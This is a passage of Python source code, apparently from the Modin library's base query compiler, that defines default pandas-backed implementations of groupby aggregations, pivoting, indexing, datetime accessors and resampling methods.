In Pandas, this\n # operation is always inplace, but this object is immutable, so we just\n # return a new one from here and let the front end handle the inplace\n # update.\n def insert(self, loc, column, value):\n \"\"\"\n Insert new column.\n\n Parameters\n ----------\n loc : int\n Insertion position.\n column : label\n Label of the new column.\n value : One-column BaseQueryCompiler, 1D array or scalar\n Data to fill new column with.\n\n Returns\n -------\n BaseQueryCompiler\n QueryCompiler with new column inserted.\n \"\"\"\n\n def inserter(df, loc, column, value):\n if isinstance(value, pandas.DataFrame):\n value = value.squeeze(axis=1)\n df.insert(loc, column, value)\n return df\n\n return DataFrameDefault.register(inserter)(\n self, loc=loc, column=column, value=value\n )\n\n # END Abstract insert\n\n # Abstract drop\n def drop(self, index=None, columns=None):\n \"\"\"\n Drop specified rows or columns.\n\n Parameters\n ----------\n index : list of labels, optional\n Labels of rows to drop.\n columns : list of labels, optional\n Labels of columns to drop.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler with removed data.\n \"\"\"\n if index is None and columns is None:\n return self\n else:\n return DataFrameDefault.register(pandas.DataFrame.drop)(\n self, index=index, columns=columns\n )\n\n # END drop\n\n # UDF (apply and agg) methods\n # There is a wide range of behaviors that are supported, so a lot of the\n # logic can get a bit convoluted.\n def apply(self, func, axis, *args, **kwargs):\n \"\"\"\n Apply passed function across given axis.\n\n Parameters\n ----------\n func : callable(pandas.Series) -> scalar, str, list or dict of such\n The function to apply to each column or row.\n axis : {0, 1}\n Target axis to apply the function along.\n 0 is for index, 1 is for columns.\n *args : iterable\n Positional arguments to pass to `func`.\n **kwargs : dict\n Keyword arguments to pass to `func`.\n\n Returns\n -------\n BaseQueryCompiler\n QueryCompiler that contains the results of execution and is built by\n the following rules:\n\n - Labels of specified axis are the passed functions names.\n - Labels of the opposite axis are preserved.\n - Each element is the result of execution of `func` against\n corresponding row/column.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.apply)(\n self, func=func, axis=axis, *args, **kwargs\n )\n\n # END UDF\n\n # Manual Partitioning methods (e.g. merge, groupby)\n # These methods require some sort of manual partitioning due to their\n # nature. 
They require certain data to exist on the same partition, and\n # after the shuffle, there should be only a local map required.\n\n # FIXME: `map_args` and `reduce_args` leaked there from `PandasQueryCompiler.groupby_*`,\n # pandas backend implements groupby via MapReduce approach, but for other backends these\n # parameters make no sense, they shouldn't be present in a base class.\n\n @doc_utils.doc_groupby_method(\n action=\"count non-null values\",\n result=\"number of non-null values\",\n refer_to=\"count\",\n )\n def groupby_count(\n self,\n by,\n axis,\n groupby_args,\n map_args,\n reduce_args=None,\n numeric_only=True,\n drop=False,\n ):\n return GroupByDefault.register(pandas.core.groupby.DataFrameGroupBy.count)(\n self,\n by=by,\n axis=axis,\n groupby_args=groupby_args,\n map_args=map_args,\n reduce_args=reduce_args,\n numeric_only=numeric_only,\n drop=drop,\n )\n\n @doc_utils.doc_groupby_method(\n action=\"check whether any element is True\",\n result=\"boolean of whether there is any element which is True\",\n refer_to=\"any\",\n )\n def groupby_any(\n self,\n by,\n axis,\n groupby_args,\n map_args,\n reduce_args=None,\n numeric_only=True,\n drop=False,\n ):\n return GroupByDefault.register(pandas.core.groupby.DataFrameGroupBy.any)(\n self,\n by=by,\n axis=axis,\n groupby_args=groupby_args,\n map_args=map_args,\n reduce_args=reduce_args,\n numeric_only=numeric_only,\n drop=drop,\n )\n\n @doc_utils.doc_groupby_method(\n action=\"get the minimum value\", result=\"minimum value\", refer_to=\"min\"\n )\n def groupby_min(\n self,\n by,\n axis,\n groupby_args,\n map_args,\n reduce_args=None,\n numeric_only=True,\n drop=False,\n ):\n return GroupByDefault.register(pandas.core.groupby.DataFrameGroupBy.min)(\n self,\n by=by,\n axis=axis,\n groupby_args=groupby_args,\n map_args=map_args,\n reduce_args=reduce_args,\n numeric_only=numeric_only,\n drop=drop,\n )\n\n @doc_utils.doc_groupby_method(result=\"product\", refer_to=\"prod\")\n def groupby_prod(\n self,\n by,\n axis,\n groupby_args,\n map_args,\n reduce_args=None,\n numeric_only=True,\n drop=False,\n ):\n return GroupByDefault.register(pandas.core.groupby.DataFrameGroupBy.prod)(\n self,\n by=by,\n axis=axis,\n groupby_args=groupby_args,\n map_args=map_args,\n reduce_args=reduce_args,\n numeric_only=numeric_only,\n drop=drop,\n )\n\n @doc_utils.doc_groupby_method(\n action=\"get the maximum value\", result=\"maximum value\", refer_to=\"max\"\n )\n def groupby_max(\n self,\n by,\n axis,\n groupby_args,\n map_args,\n reduce_args=None,\n numeric_only=True,\n drop=False,\n ):\n return GroupByDefault.register(pandas.core.groupby.DataFrameGroupBy.max)(\n self,\n by=by,\n axis=axis,\n groupby_args=groupby_args,\n map_args=map_args,\n reduce_args=reduce_args,\n numeric_only=numeric_only,\n drop=drop,\n )\n\n @doc_utils.doc_groupby_method(\n action=\"check whether all elements are True\",\n result=\"boolean of whether all elements are True\",\n refer_to=\"all\",\n )\n def groupby_all(\n self,\n by,\n axis,\n groupby_args,\n map_args,\n reduce_args=None,\n numeric_only=True,\n drop=False,\n ):\n return GroupByDefault.register(pandas.core.groupby.DataFrameGroupBy.all)(\n self,\n by=by,\n axis=axis,\n groupby_args=groupby_args,\n map_args=map_args,\n reduce_args=reduce_args,\n numeric_only=numeric_only,\n drop=drop,\n )\n\n @doc_utils.doc_groupby_method(result=\"sum\", refer_to=\"sum\")\n def groupby_sum(\n self,\n by,\n axis,\n groupby_args,\n map_args,\n reduce_args=None,\n numeric_only=True,\n drop=False,\n ):\n return 
GroupByDefault.register(pandas.core.groupby.DataFrameGroupBy.sum)(\n self,\n by=by,\n axis=axis,\n groupby_args=groupby_args,\n map_args=map_args,\n reduce_args=reduce_args,\n numeric_only=numeric_only,\n drop=drop,\n )\n\n @doc_utils.doc_groupby_method(\n action=\"get the number of elements\",\n result=\"number of elements\",\n refer_to=\"size\",\n )\n def groupby_size(\n self,\n by,\n axis,\n groupby_args,\n map_args,\n reduce_args=None,\n numeric_only=True,\n drop=False,\n ):\n return GroupByDefault.register(pandas.core.groupby.DataFrameGroupBy.size)(\n self,\n by=by,\n axis=axis,\n groupby_args=groupby_args,\n map_args=map_args,\n reduce_args=reduce_args,\n numeric_only=numeric_only,\n drop=drop,\n method=\"size\",\n )\n\n @doc_utils.add_refer_to(\"GroupBy.aggregate\")\n def groupby_agg(\n self,\n by,\n is_multi_by,\n axis,\n agg_func,\n agg_args,\n agg_kwargs,\n groupby_kwargs,\n drop=False,\n ):\n \"\"\"\n Group QueryCompiler data and apply passed aggregation function.\n\n Parameters\n ----------\n by : BaseQueryCompiler, column or index label, Grouper or list of such\n Object that determines groups.\n is_multi_by : bool\n If `by` is a QueryCompiler or list of such, indicates whether it's\n grouping on multiple columns/rows.\n axis : {0, 1}\n Axis to group and apply aggregation function along.\n 0 is for index, 1 is for columns.\n agg_func : dict or callable(DataFrameGroupBy) -> DataFrame\n Function to apply to the GroupBy object.\n agg_args : dict\n Positional arguments to pass to the `agg_func`.\n agg_kwargs : dict\n Keyword arguments to pass to the `agg_func`.\n groupby_kwargs : dict\n GroupBy parameters as expected by ``modin.pandas.DataFrame.groupby`` signature.\n drop : bool, default: False\n If `by` is a QueryCompiler, indicates whether or not the by-data came\n from `self`.\n\n Returns\n -------\n BaseQueryCompiler\n QueryCompiler containing the result of groupby aggregation.\n \"\"\"\n if isinstance(by, type(self)) and len(by.columns) == 1:\n by = by.columns[0] if drop else by.to_pandas().squeeze()\n elif isinstance(by, type(self)):\n by = list(by.columns)\n\n return GroupByDefault.register(pandas.core.groupby.DataFrameGroupBy.aggregate)(\n self,\n by=by,\n is_multi_by=is_multi_by,\n axis=axis,\n agg_func=agg_func,\n groupby_args=groupby_kwargs,\n agg_args=agg_kwargs,\n drop=drop,\n )\n\n # END Manual Partitioning methods\n\n @doc_utils.add_refer_to(\"DataFrame.unstack\")\n def unstack(self, level, fill_value):\n \"\"\"\n Pivot a level of the (necessarily hierarchical) index labels.\n\n Parameters\n ----------\n level : int or label\n fill_value : scalar or dict\n\n Returns\n -------\n BaseQueryCompiler\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.unstack)(\n self, level=level, fill_value=fill_value\n )\n\n @doc_utils.add_refer_to(\"DataFrame.pivot\")\n def pivot(self, index, columns, values):\n \"\"\"\n Produce pivot table based on column values.\n\n Parameters\n ----------\n index : label or list of such, pandas.Index, optional\n columns : label or list of such\n values : label or list of such, optional\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler containing pivot table.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.pivot)(\n self, index=index, columns=columns, values=values\n )\n\n @doc_utils.add_refer_to(\"DataFrame.pivot_table\")\n def pivot_table(\n self,\n index,\n values,\n columns,\n aggfunc,\n fill_value,\n margins,\n dropna,\n margins_name,\n observed,\n sort,\n ):\n \"\"\"\n Create a spreadsheet-style pivot table from 
underlying data.\n\n Parameters\n ----------\n index : label, pandas.Grouper, array or list of such\n values : label, optional\n columns : column, pandas.Grouper, array or list of such\n aggfunc : callable(pandas.Series) -> scalar, dict of list of such\n fill_value : scalar, optional\n margins : bool\n dropna : bool\n margins_name : str\n observed : bool\n sort : bool\n\n Returns\n -------\n BaseQueryCompiler\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.pivot_table)(\n self,\n index=index,\n values=values,\n columns=columns,\n aggfunc=aggfunc,\n fill_value=fill_value,\n margins=margins,\n dropna=dropna,\n margins_name=margins_name,\n observed=observed,\n sort=sort,\n )\n\n @doc_utils.add_refer_to(\"get_dummies\")\n def get_dummies(self, columns, **kwargs): # noqa: PR02\n \"\"\"\n Convert categorical variables to dummy variables for certain columns.\n\n Parameters\n ----------\n columns : label or list of such\n Columns to convert.\n prefix : str or list of such\n prefix_sep : str\n dummy_na : bool\n drop_first : bool\n dtype : dtype\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler with categorical variables converted to dummy.\n \"\"\"\n\n def get_dummies(df, columns, **kwargs):\n return pandas.get_dummies(df, columns=columns, **kwargs)\n\n return DataFrameDefault.register(get_dummies)(self, columns=columns, **kwargs)\n\n @doc_utils.add_one_column_warning\n @doc_utils.add_refer_to(\"Series.repeat\")\n def repeat(self, repeats):\n \"\"\"\n Repeat each element of one-column QueryCompiler given number of times.\n\n Parameters\n ----------\n repeats : int or array of ints\n The number of repetitions for each element. This should be a\n non-negative integer. Repeating 0 times will return an empty\n QueryCompiler.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler with repeated elements.\n \"\"\"\n return SeriesDefault.register(pandas.Series.repeat)(self, repeats=repeats)\n\n # Indexing\n\n index = property(_get_axis(0), _set_axis(0))\n columns = property(_get_axis(1), _set_axis(1))\n\n def get_axis(self, axis):\n \"\"\"\n Return index labels of the specified axis.\n\n Parameters\n ----------\n axis : {0, 1}\n Axis to return labels on.\n 0 is for index, when 1 is for columns.\n\n Returns\n -------\n pandas.Index\n \"\"\"\n return self.index if axis == 0 else self.columns\n\n def view(self, index=None, columns=None):\n \"\"\"\n Mask QueryCompiler with passed keys.\n\n Parameters\n ----------\n index : list of ints, optional\n Positional indices of rows to grab.\n columns : list of ints, optional\n Positional indices of columns to grab.\n\n Returns\n -------\n BaseQueryCompiler\n New masked QueryCompiler.\n \"\"\"\n index = [] if index is None else index\n columns = [] if columns is None else columns\n\n def applyier(df):\n return df.iloc[index, columns]\n\n return DataFrameDefault.register(applyier)(self)\n\n def insert_item(self, axis, loc, value, how=\"inner\", replace=False):\n \"\"\"\n Insert rows/columns defined by `value` at the specified position.\n\n If frames are not aligned along specified axis, perform frames alignment first.\n\n Parameters\n ----------\n axis : {0, 1}\n Axis to insert along. 
0 means insert rows, when 1 means insert columns.\n loc : int\n Position to insert `value`.\n value : BaseQueryCompiler\n Rows/columns to insert.\n how : {\"inner\", \"outer\", \"left\", \"right\"}, default: \"inner\"\n Type of join that will be used if frames are not aligned.\n replace : bool, default: False\n Whether to insert item after column/row at `loc-th` position or to replace\n it by `value`.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler with inserted values.\n \"\"\"\n assert isinstance(value, type(self))\n\n def mask(idx):\n if len(idx) == len(self.get_axis(axis)):\n return self\n return (\n self.getitem_column_array(idx, numeric=True)\n if axis\n else self.getitem_row_array(idx)\n )\n\n if 0 <= loc < len(self.get_axis(axis)):\n first_mask = mask(list(range(loc)))\n second_mask_loc = loc + 1 if replace else loc\n second_mask = mask(list(range(second_mask_loc, len(self.get_axis(axis)))))\n return first_mask.concat(axis, [value, second_mask], join=how, sort=False)\n else:\n return self.concat(axis, [value], join=how, sort=False)\n\n def setitem(self, axis, key, value):\n \"\"\"\n Set the row/column defined by `key` to the `value` provided.\n\n Parameters\n ----------\n axis : {0, 1}\n Axis to set `value` along. 0 means set row, 1 means set column.\n key : label\n Row/column label to set `value` in.\n value : BaseQueryCompiler, list-like or scalar\n Define new row/column value.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler with updated `key` value.\n \"\"\"\n\n def setitem(df, axis, key, value):\n if is_scalar(key) and isinstance(value, pandas.DataFrame):\n value = value.squeeze()\n if not axis:\n df[key] = value\n else:\n df.loc[key] = value\n return df\n\n return DataFrameDefault.register(setitem)(self, axis=axis, key=key, value=value)\n\n def write_items(self, row_numeric_index, col_numeric_index, broadcasted_items):\n \"\"\"\n Update QueryCompiler elements at the specified positions by passed values.\n\n In contrast to ``setitem`` this method allows to do 2D assignments.\n\n Parameters\n ----------\n row_numeric_index : list of ints\n Row positions to write value.\n col_numeric_index : list of ints\n Column positions to write value.\n broadcasted_items : 2D-array\n Values to write. 
Have to be same size as defined by `row_numeric_index`\n and `col_numeric_index`.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler with updated values.\n \"\"\"\n\n def write_items(df, broadcasted_items):\n if isinstance(df.iloc[row_numeric_index, col_numeric_index], pandas.Series):\n broadcasted_items = broadcasted_items.squeeze()\n df.iloc[\n list(row_numeric_index), list(col_numeric_index)\n ] = broadcasted_items\n return df\n\n return DataFrameDefault.register(write_items)(\n self, broadcasted_items=broadcasted_items\n )\n\n # END Abstract methods for QueryCompiler\n\n @property\n def __constructor__(self):\n \"\"\"\n Get query compiler constructor.\n\n By default, constructor method will invoke an init.\n\n Returns\n -------\n callable\n \"\"\"\n return type(self)\n\n # __delitem__\n # This will change the shape of the resulting data.\n def delitem(self, key):\n \"\"\"\n Drop `key` column.\n\n Parameters\n ----------\n key : label\n Column name to drop.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler without `key` column.\n \"\"\"\n return self.drop(columns=[key])\n\n # END __delitem__\n\n def has_multiindex(self, axis=0):\n \"\"\"\n Check if specified axis is indexed by MultiIndex.\n\n Parameters\n ----------\n axis : {0, 1}, default: 0\n The axis to check (0 - index, 1 - columns).\n\n Returns\n -------\n bool\n True if index at specified axis is MultiIndex and False otherwise.\n \"\"\"\n if axis == 0:\n return isinstance(self.index, pandas.MultiIndex)\n assert axis == 1\n return isinstance(self.columns, pandas.MultiIndex)\n\n def get_index_name(self, axis=0):\n \"\"\"\n Get index name of specified axis.\n\n Parameters\n ----------\n axis : {0, 1}, default: 0\n Axis to get index name on.\n\n Returns\n -------\n hashable\n Index name, None for MultiIndex.\n \"\"\"\n return self.get_axis(axis).name\n\n def set_index_name(self, name, axis=0):\n \"\"\"\n Set index name for the specified axis.\n\n Parameters\n ----------\n name : hashable\n New index name.\n axis : {0, 1}, default: 0\n Axis to set name along.\n \"\"\"\n self.get_axis(axis).name = name\n\n def get_index_names(self, axis=0):\n \"\"\"\n Get index names of specified axis.\n\n Parameters\n ----------\n axis : {0, 1}, default: 0\n Axis to get index names on.\n\n Returns\n -------\n list\n Index names.\n \"\"\"\n return self.get_axis(axis).names\n\n def set_index_names(self, names, axis=0):\n \"\"\"\n Set index names for the specified axis.\n\n Parameters\n ----------\n names : list\n New index names.\n axis : {0, 1}, default: 0\n Axis to set names along.\n \"\"\"\n self.get_axis(axis).names = names\n\n # DateTime methods\n\n @doc_utils.doc_dt_round(refer_to=\"ceil\")\n def dt_ceil(self, freq, ambiguous=\"raise\", nonexistent=\"raise\"):\n return DateTimeDefault.register(pandas.Series.dt.ceil)(\n self, freq, ambiguous, nonexistent\n )\n\n @doc_utils.add_one_column_warning\n @doc_utils.add_refer_to(\"Series.dt.components\")\n def dt_components(self):\n \"\"\"\n Spread each date-time value into its components (days, hours, minutes...).\n\n Returns\n -------\n BaseQueryCompiler\n \"\"\"\n return DateTimeDefault.register(pandas.Series.dt.components)(self)\n\n @doc_utils.doc_dt_timestamp(\n prop=\"the date without timezone information\", refer_to=\"date\"\n )\n def dt_date(self):\n return DateTimeDefault.register(pandas.Series.dt.date)(self)\n\n @doc_utils.doc_dt_timestamp(prop=\"day component\", refer_to=\"day\")\n def dt_day(self):\n return DateTimeDefault.register(pandas.Series.dt.day)(self)\n\n 
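# NOTE (editorial, illustrative only -- not part of the original class): the dt_* accessors\n # above are thin defaults that execute through pandas via DateTimeDefault.register.\n # A minimal sketch of how a concrete backend might override one of them with a native,\n # partition-wise implementation; the MyQueryCompiler name and its _modin_frame attribute\n # are assumptions for illustration, not part of this base class:\n #\n # class MyQueryCompiler(BaseQueryCompiler):\n # def dt_day(self):\n # # apply the pandas .dt.day accessor within each partition rather than\n # # defaulting the whole operation to pandas\n # return self.__constructor__(\n # self._modin_frame.map(lambda df: df.apply(lambda col: col.dt.day))\n # )\n\n 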
@doc_utils.doc_dt_timestamp(\n prop=\"day name\", refer_to=\"day_name\", params=\"locale : str, optional\"\n )\n def dt_day_name(self, locale=None):\n return DateTimeDefault.register(pandas.Series.dt.day_name)(self, locale)\n\n @doc_utils.doc_dt_timestamp(prop=\"integer day of week\", refer_to=\"dayofweek\")\n # FIXME: `dt_dayofweek` is an alias for `dt_weekday`, one of them should\n # be removed (Modin issue #3107).\n def dt_dayofweek(self):\n return DateTimeDefault.register(pandas.Series.dt.dayofweek)(self)\n\n @doc_utils.doc_dt_timestamp(prop=\"day of year\", refer_to=\"dayofyear\")\n def dt_dayofyear(self):\n return DateTimeDefault.register(pandas.Series.dt.dayofyear)(self)\n\n @doc_utils.doc_dt_interval(prop=\"days\", refer_to=\"days\")\n def dt_days(self):\n return DateTimeDefault.register(pandas.Series.dt.days)(self)\n\n @doc_utils.doc_dt_timestamp(\n prop=\"number of days in month\", refer_to=\"days_in_month\"\n )\n # FIXME: `dt_days_in_month` is an alias for `dt_daysinmonth`, one of them should\n # be removed (Modin issue #3107).\n def dt_days_in_month(self):\n return DateTimeDefault.register(pandas.Series.dt.days_in_month)(self)\n\n @doc_utils.doc_dt_timestamp(prop=\"number of days in month\", refer_to=\"daysinmonth\")\n def dt_daysinmonth(self):\n return DateTimeDefault.register(pandas.Series.dt.daysinmonth)(self)\n\n @doc_utils.doc_dt_period(prop=\"the timestamp of end time\", refer_to=\"end_time\")\n def dt_end_time(self):\n return DateTimeDefault.register(pandas.Series.dt.end_time)(self)\n\n @doc_utils.doc_dt_round(refer_to=\"floor\")\n def dt_floor(self, freq, ambiguous=\"raise\", nonexistent=\"raise\"):\n return DateTimeDefault.register(pandas.Series.dt.floor)(\n self, freq, ambiguous, nonexistent\n )\n\n @doc_utils.add_one_column_warning\n @doc_utils.add_refer_to(\"Series.dt.freq\")\n def dt_freq(self):\n \"\"\"\n Get the time frequency of the underlying time-series data.\n\n Returns\n -------\n BaseQueryCompiler\n QueryCompiler containing a single value, the frequency of the data.\n \"\"\"\n return DateTimeDefault.register(pandas.Series.dt.freq)(self)\n\n @doc_utils.doc_dt_timestamp(prop=\"hour\", refer_to=\"hour\")\n def dt_hour(self):\n return DateTimeDefault.register(pandas.Series.dt.hour)(self)\n\n @doc_utils.doc_dt_timestamp(\n prop=\"the boolean of whether corresponding year is leap\",\n refer_to=\"is_leap_year\",\n )\n def dt_is_leap_year(self):\n return DateTimeDefault.register(pandas.Series.dt.is_leap_year)(self)\n\n @doc_utils.doc_dt_timestamp(\n prop=\"the boolean of whether the date is the last day of the month\",\n refer_to=\"is_month_end\",\n )\n def dt_is_month_end(self):\n return DateTimeDefault.register(pandas.Series.dt.is_month_end)(self)\n\n @doc_utils.doc_dt_timestamp(\n prop=\"the boolean of whether the date is the first day of the month\",\n refer_to=\"is_month_start\",\n )\n def dt_is_month_start(self):\n return DateTimeDefault.register(pandas.Series.dt.is_month_start)(self)\n\n @doc_utils.doc_dt_timestamp(\n prop=\"the boolean of whether the date is the last day of the quarter\",\n refer_to=\"is_quarter_end\",\n )\n def dt_is_quarter_end(self):\n return DateTimeDefault.register(pandas.Series.dt.is_quarter_end)(self)\n\n @doc_utils.doc_dt_timestamp(\n prop=\"the boolean of whether the date is the first day of the quarter\",\n refer_to=\"is_quarter_start\",\n )\n def dt_is_quarter_start(self):\n return DateTimeDefault.register(pandas.Series.dt.is_quarter_start)(self)\n\n @doc_utils.doc_dt_timestamp(\n prop=\"the boolean of whether the date is the 
last day of the year\",\n refer_to=\"is_year_end\",\n )\n def dt_is_year_end(self):\n return DateTimeDefault.register(pandas.Series.dt.is_year_end)(self)\n\n @doc_utils.doc_dt_timestamp(\n prop=\"the boolean of whether the date is the first day of the year\",\n refer_to=\"is_year_start\",\n )\n def dt_is_year_start(self):\n return DateTimeDefault.register(pandas.Series.dt.is_year_start)(self)\n\n @doc_utils.doc_dt_timestamp(prop=\"microseconds component\", refer_to=\"microsecond\")\n def dt_microsecond(self):\n return DateTimeDefault.register(pandas.Series.dt.microsecond)(self)\n\n @doc_utils.doc_dt_interval(prop=\"microseconds component\", refer_to=\"microseconds\")\n def dt_microseconds(self):\n return DateTimeDefault.register(pandas.Series.dt.microseconds)(self)\n\n @doc_utils.doc_dt_timestamp(prop=\"minute component\", refer_to=\"minute\")\n def dt_minute(self):\n return DateTimeDefault.register(pandas.Series.dt.minute)(self)\n\n @doc_utils.doc_dt_timestamp(prop=\"month component\", refer_to=\"month\")\n def dt_month(self):\n return DateTimeDefault.register(pandas.Series.dt.month)(self)\n\n @doc_utils.doc_dt_timestamp(\n prop=\"the month name\", refer_to=\"month name\", params=\"locale : str, optional\"\n )\n def dt_month_name(self, locale=None):\n return DateTimeDefault.register(pandas.Series.dt.month_name)(self, locale)\n\n @doc_utils.doc_dt_timestamp(prop=\"nanoseconds component\", refer_to=\"nanosecond\")\n def dt_nanosecond(self):\n return DateTimeDefault.register(pandas.Series.dt.nanosecond)(self)\n\n @doc_utils.doc_dt_interval(prop=\"nanoseconds component\", refer_to=\"nanoseconds\")\n def dt_nanoseconds(self):\n return DateTimeDefault.register(pandas.Series.dt.nanoseconds)(self)\n\n @doc_utils.add_one_column_warning\n @doc_utils.add_refer_to(\"Series.dt.normalize\")\n def dt_normalize(self):\n \"\"\"\n Set the time component of each date-time value to midnight.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler containing date-time values with midnight time.\n \"\"\"\n return DateTimeDefault.register(pandas.Series.dt.normalize)(self)\n\n @doc_utils.doc_dt_timestamp(prop=\"quarter component\", refer_to=\"quarter\")\n def dt_quarter(self):\n return DateTimeDefault.register(pandas.Series.dt.quarter)(self)\n\n @doc_utils.doc_dt_period(prop=\"the fiscal year\", refer_to=\"qyear\")\n def dt_qyear(self):\n return DateTimeDefault.register(pandas.Series.dt.qyear)(self)\n\n @doc_utils.doc_dt_round(refer_to=\"round\")\n def dt_round(self, freq, ambiguous=\"raise\", nonexistent=\"raise\"):\n return DateTimeDefault.register(pandas.Series.dt.round)(\n self, freq, ambiguous, nonexistent\n )\n\n @doc_utils.doc_dt_timestamp(prop=\"seconds component\", refer_to=\"second\")\n def dt_second(self):\n return DateTimeDefault.register(pandas.Series.dt.second)(self)\n\n @doc_utils.doc_dt_interval(prop=\"seconds component\", refer_to=\"seconds\")\n def dt_seconds(self):\n return DateTimeDefault.register(pandas.Series.dt.seconds)(self)\n\n @doc_utils.doc_dt_period(prop=\"the timestamp of start time\", refer_to=\"start_time\")\n def dt_start_time(self):\n return DateTimeDefault.register(pandas.Series.dt.start_time)(self)\n\n @doc_utils.add_refer_to(\"Series.dt.strftime\")\n def dt_strftime(self, date_format):\n \"\"\"\n Format underlying date-time data using specified format.\n\n Parameters\n ----------\n date_format : str\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler containing formated date-time values.\n \"\"\"\n return 
DateTimeDefault.register(pandas.Series.dt.strftime)(self, date_format)\n\n @doc_utils.doc_dt_timestamp(prop=\"time component\", refer_to=\"time\")\n def dt_time(self):\n return DateTimeDefault.register(pandas.Series.dt.time)(self)\n\n @doc_utils.doc_dt_timestamp(\n prop=\"time component with timezone information\", refer_to=\"timetz\"\n )\n def dt_timetz(self):\n return DateTimeDefault.register(pandas.Series.dt.timetz)(self)\n\n @doc_utils.add_one_column_warning\n @doc_utils.add_refer_to(\"Series.dt.to_period\")\n def dt_to_period(self, freq=None):\n \"\"\"\n Convert underlying data to the period at a particular frequency.\n\n Parameters\n ----------\n freq : str, optional\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler containing period data.\n \"\"\"\n return DateTimeDefault.register(pandas.Series.dt.to_period)(self, freq)\n\n @doc_utils.add_one_column_warning\n @doc_utils.add_refer_to(\"Series.dt.to_pydatetime\")\n def dt_to_pydatetime(self):\n \"\"\"\n Convert underlying data to array of python native ``datetime``.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler containing 1D array of ``datetime`` objects.\n \"\"\"\n return DateTimeDefault.register(pandas.Series.dt.to_pydatetime)(self)\n\n # FIXME: there are no references to this method, we should either remove it\n # or add a call reference at the DataFrame level (Modin issue #3103).\n @doc_utils.add_one_column_warning\n @doc_utils.add_refer_to(\"Series.dt.to_pytimedelta\")\n def dt_to_pytimedelta(self):\n \"\"\"\n Convert underlying data to array of python native ``datetime.timedelta``.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler containing 1D array of ``datetime.timedelta``.\n \"\"\"\n return DateTimeDefault.register(pandas.Series.dt.to_pytimedelta)(self)\n\n @doc_utils.doc_dt_period(\n prop=\"the timestamp representation\", refer_to=\"to_timestamp\"\n )\n def dt_to_timestamp(self):\n return DateTimeDefault.register(pandas.Series.dt.to_timestamp)(self)\n\n @doc_utils.doc_dt_interval(prop=\"duration in seconds\", refer_to=\"total_seconds\")\n def dt_total_seconds(self):\n return DateTimeDefault.register(pandas.Series.dt.total_seconds)(self)\n\n @doc_utils.add_one_column_warning\n @doc_utils.add_refer_to(\"Series.dt.tz\")\n def dt_tz(self):\n \"\"\"\n Get the time-zone of the underlying time-series data.\n\n Returns\n -------\n BaseQueryCompiler\n QueryCompiler containing a single value, time-zone of the data.\n \"\"\"\n return DateTimeDefault.register(pandas.Series.dt.tz)(self)\n\n @doc_utils.add_one_column_warning\n @doc_utils.add_refer_to(\"Series.dt.tz_convert\")\n def dt_tz_convert(self, tz):\n \"\"\"\n Convert time-series data to the specified time zone.\n\n Parameters\n ----------\n tz : str, pytz.timezone\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler containing values with converted time zone.\n \"\"\"\n return DateTimeDefault.register(pandas.Series.dt.tz_convert)(self, tz)\n\n @doc_utils.add_one_column_warning\n @doc_utils.add_refer_to(\"Series.dt.tz_localize\")\n def dt_tz_localize(self, tz, ambiguous=\"raise\", nonexistent=\"raise\"):\n \"\"\"\n Localize tz-naive to tz-aware.\n\n Parameters\n ----------\n tz : str, pytz.timezone, optional\n ambiguous : {\"raise\", \"inner\", \"NaT\"} or bool mask, default: \"raise\"\n nonexistent : {\"raise\", \"shift_forward\", \"shift_backward, \"NaT\"} or pandas.timedelta, default: \"raise\"\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler containing values with localized time zone.\n \"\"\"\n return 
DateTimeDefault.register(pandas.Series.dt.tz_localize)(\n self, tz, ambiguous, nonexistent\n )\n\n @doc_utils.doc_dt_timestamp(prop=\"week component\", refer_to=\"week\")\n def dt_week(self):\n return DateTimeDefault.register(pandas.Series.dt.week)(self)\n\n @doc_utils.doc_dt_timestamp(prop=\"integer day of week\", refer_to=\"weekday\")\n def dt_weekday(self):\n return DateTimeDefault.register(pandas.Series.dt.weekday)(self)\n\n @doc_utils.doc_dt_timestamp(prop=\"week of year\", refer_to=\"weekofyear\")\n def dt_weekofyear(self):\n return DateTimeDefault.register(pandas.Series.dt.weekofyear)(self)\n\n @doc_utils.doc_dt_timestamp(prop=\"year component\", refer_to=\"year\")\n def dt_year(self):\n return DateTimeDefault.register(pandas.Series.dt.year)(self)\n\n # End of DateTime methods\n\n # Resample methods\n\n # FIXME:\n # 1. Backend shouldn't care about differences between Series and DataFrame\n # so `resample_agg_df` and `resample_agg_ser` should be combined (Modin issue #3104).\n # 2. In DataFrame API `Resampler.aggregate` is an alias for `Resampler.apply`\n # we should remove one of these methods: `resample_agg_*` or `resample_app_*` (Modin issue #3107).\n @doc_utils.doc_resample_agg(\n action=\"apply passed aggregation function\",\n params=\"func : str, dict, callable(pandas.Series) -> scalar, or list of such\",\n output=\"function names\",\n refer_to=\"agg\",\n )\n def resample_agg_df(self, resample_args, func, *args, **kwargs):\n return ResampleDefault.register(pandas.core.resample.Resampler.aggregate)(\n self, resample_args, func, *args, **kwargs\n )\n\n @doc_utils.add_deprecation_warning(replacement_method=\"resample_agg_df\")\n @doc_utils.doc_resample_agg(\n action=\"apply passed aggregation function in a one-column query compiler\",\n params=\"func : str, dict, callable(pandas.Series) -> scalar, or list of such\",\n output=\"function names\",\n refer_to=\"agg\",\n )\n def resample_agg_ser(self, resample_args, func, *args, **kwargs):\n return ResampleDefault.register(\n pandas.core.resample.Resampler.aggregate, squeeze_self=True\n )(self, resample_args, func, *args, **kwargs)\n\n 